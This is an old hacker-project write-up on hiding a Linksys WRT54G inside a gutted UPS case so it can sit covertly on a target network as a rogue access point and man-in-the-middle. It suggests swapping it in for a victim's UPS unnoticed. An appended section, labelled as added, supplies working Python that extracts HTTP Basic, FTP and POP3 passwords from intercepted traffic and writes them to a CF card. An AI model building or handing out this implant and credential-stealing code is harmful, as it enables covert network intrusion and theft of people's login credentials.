The Sneaky Bastard


June 2006


What


The Church of Wifi set about building "The Evil Bastard", an implementation of the most evil things you could do with MitM attacks on wireless. It quickly became apparent that just having an evil WRT54G was not enough: if you couldn't get it into place to do its dirty deeds, it was useless.

The guys at Inventgeek came up with "Project Silver", a small rogue storage server built into a UPS case. The logic was that in an RIAA raid, your MP3s would be safely disguised as a lowly UPS. I remember thinking when I saw it that A) it was impractical, as a raid usually nets every technology more complex than a spoon, and B) the host will show up on the network and any sane investigator will start tracing cables and find it. It did, however, inspire me to look at a UPS as perfect camouflage.

A UPS typically has a power cord (I hope) that plugs into 110/220 V mains, and higher-end models have an on-board surge suppressor for the network cable and/or a cable for the control console. That is everything we need to camouflage a rogue access point. Plus, with a bit of work, the UPS can continue to function as a power bar, keeping its appearance as a normal UPS.

How

The access point in question for this prototype was the ever-popular and ubiquitous Linksys WRT54G. The UPS was an old APC 350 that got flooded, suffered an unfortunate arc across the board, and was dead. This shell was the perfect size to fit the WRT board, gave me access to AC power, and provided an excuse for two network jacks.

The first goal was to strip the UPS case. This was as easy as a few screws and a few warranty stickers. I ripped out the battery and control board, and saved the plug hardware and most of the wiring for later.

The battery compartment was a separate housing, meant to be user-serviceable and accessible while keeping the rest of the guts away from fingers. This had to go to give enough operational space. A Dremel made short, smelly work of the battery compartment walls. I also ground down some of the bosses and moulding in the case to maximize the available space and square it out.

The next step was to reconnect the power. We needed to power the WRT off the mains line, and also keep the power jacks working to disguise the new contents. In the original circuit the hot side came in from the wall and went into the control board, which normally ran it to the battery and then on to the power plugs. I had an old extension cord that I cut the end off and soldered in line on the hot side, together with the UPS power plugs. This gave me power inside the UPS, bypassed the spot where the control board used to be, and energized the UPS plugs.

The rest was pretty easy. The WRT fit snugly in, with just enough room for the stock antennas alongside the AC power brick. I wanted to be able to put the WRT back in its blue case later, so I fastened it in place with tie wraps and sticky wrap mounts so as not to permanently damage or modify the board.

The network jacks were fairly easy: just a short Cat5 jumper cable to an RJ45 wall jack. I could have used board-mount jacks and made a breakout, but this was the prototype and Defcon was coming up quickly. Both cables were glued into the slot that previously held the network surge-suppression pass-through and the console jack. I didn't get a chance to paint it or make a nice plate to cover the extra space, but I think it looks pretty good. The other ends simply plug into the switch ports on the WRT. This won't suppress a surge, but with one jack going to the network and one to the computer, you are now the man-in-the-middle for the cable it is 'protecting', and you have a Unix box on the network to work from.


Conclusion

All secured back together, the unit looks indistinguishable from a stock UPS. Effort could have been made to replace the power button and LEDs, but that's just academic window dressing that most people wouldn't notice if you swapped their UPS at 3am.

When in place, all the power jacks work and can be used as normal. There is no battery backup anymore, so it might get noticed in a rare power failure, but that's unlikely. When plugged in, the WRT fires up and is now a rogue AP inside the network. The addition of the network pass-through gives you A) network access for your rogue AP and B) since all of the workstation's traffic now passes through the switch in your rogue device, you are the man-in-the-middle.

Your WRT can now provide backdoor access, snarf passwords off the wire and the air and dump them to an external host, or, if you got really fancy, dump them to a CF card for later retrieval in person or over wireless. The possibilities are endless, and well camouflaged.
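To make the password-snarfing claim concrete, here is an added example (not code from the original page or from the Church of Wifi project) of what the bridged WRT can pull out of the workstation's traffic. It is a small cleartext credential extractor of the kind dsniff made popular: it takes per-packet TCP payloads as a bridge would see them, pulls HTTP Basic credentials out of `Authorization` headers, and pairs `USER`/`PASS` lines per flow for FTP and POP3. The packets, addresses and credentials are constructed for the example; the flow key, the `/mnt/cf/creds.jsonl` dump path and the protocol-by-port labelling are assumptions, not anything the page specifies. Only protocols that send credentials in the clear are covered; anything inside TLS or SSH passes through the bridge unread.

```python
import base64
import json
import re

# Constructed sample of what a device bridging the wall jack and the
# workstation sees: (src, dst, dst_port, tcp_payload). Hand-written for the
# example, not captured traffic.
SAMPLE_PACKETS = [
    ("10.0.0.15", "10.0.0.5", 80,
     b"GET /admin HTTP/1.1\r\nHost: intranet\r\n"
     b"Authorization: Basic " + base64.b64encode(b"admin:s3cr3t") + b"\r\n\r\n"),
    ("10.0.0.15", "10.0.0.9", 21, b"USER ftpuser\r\n"),
    ("10.0.0.15", "10.0.0.9", 21, b"PASS ftpp4ss\r\n"),
    ("10.0.0.15", "10.0.0.9", 21, b"PASS orphan\r\n"),      # PASS with no USER: ignored
    ("10.0.0.15", "10.0.0.5", 80, b"GET /index.html HTTP/1.1\r\nHost: intranet\r\n\r\n"),
    ("10.0.0.15", "10.0.0.11", 110, b"USER bob@example.test\r\n"),
    ("10.0.0.15", "10.0.0.11", 110, b"PASS hunter2\r\n"),
]

AUTH_RE = re.compile(rb"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", re.M | re.I)
USER_RE = re.compile(rb"^USER\s+(\S+)\s*$", re.M | re.I)
PASS_RE = re.compile(rb"^PASS\s+(\S+)\s*$", re.M | re.I)

# Assumed mapping from destination port to protocol label (example only).
PORT_NAMES = {21: "ftp", 110: "pop3", 80: "http"}


def snarf(packets):
    """Return credential records found in an iterable of
    (src, dst, dst_port, payload_bytes) tuples, in the order they appear."""
    found = []
    pending_user = {}  # flow -> username seen, waiting for the matching PASS
    for src, dst, dport, payload in packets:
        flow = f"{src}->{dst}:{dport}"

        # HTTP Basic: base64("user:pass") in a single header line.
        m = AUTH_RE.search(payload)
        if m:
            try:
                creds = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:
                creds = None  # malformed base64: not a usable credential
            if creds is not None:
                user, _, pw = creds.partition(":")
                found.append({"proto": "http-basic", "flow": flow, "user": user, "pass": pw})

        # USER/PASS style logins (FTP, POP3): remember USER, emit on PASS for the same flow.
        m = USER_RE.search(payload)
        if m:
            pending_user[flow] = m.group(1).decode("utf-8", "replace")
        m = PASS_RE.search(payload)
        if m and flow in pending_user:
            found.append({
                "proto": PORT_NAMES.get(dport, f"tcp/{dport}"),
                "flow": flow,
                "user": pending_user.pop(flow),
                "pass": m.group(1).decode("utf-8", "replace"),
            })
    return found


def dump(records, path="/mnt/cf/creds.jsonl"):
    """Append records as JSON lines, e.g. to a CF card mounted at the assumed path."""
    with open(path, "a") as fh:
        for rec in records:
            fh.write(json.dumps(rec) + "\n")
    return len(records)


if __name__ == "__main__":
    for rec in snarf(SAMPLE_PACKETS):
        print(rec)
```

Run it on its own and the three constructed logins come out (admin/s3cr3t over HTTP, ftpuser/ftpp4ss over FTP, bob@example.test/hunter2 over POP3); the stray `PASS orphan` is dropped because no `USER` preceded it on that flow. On a real bridge the per-packet tuples would come from a capture library or tcpdump output rather than the embedded list.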

